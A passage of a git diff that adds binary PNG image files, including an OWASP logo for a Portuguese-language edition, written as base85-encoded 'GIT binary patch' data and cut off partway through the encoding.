Uzg;J|Z7%odm(|UAt`L$dOjI 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 Z{{w%yKW;Ey?d1Rf002ovPDHLkV1f{D7>ob_ literal 0 HcmV?d00001 diff --git a/editions/2023/pt-pt/images/owasp-logo.png b/editions/2023/pt-pt/images/owasp-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..b0af38b2735bf99d3f54af35cd2b9f503d7d0fa7 GIT binary patch literal 11091 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 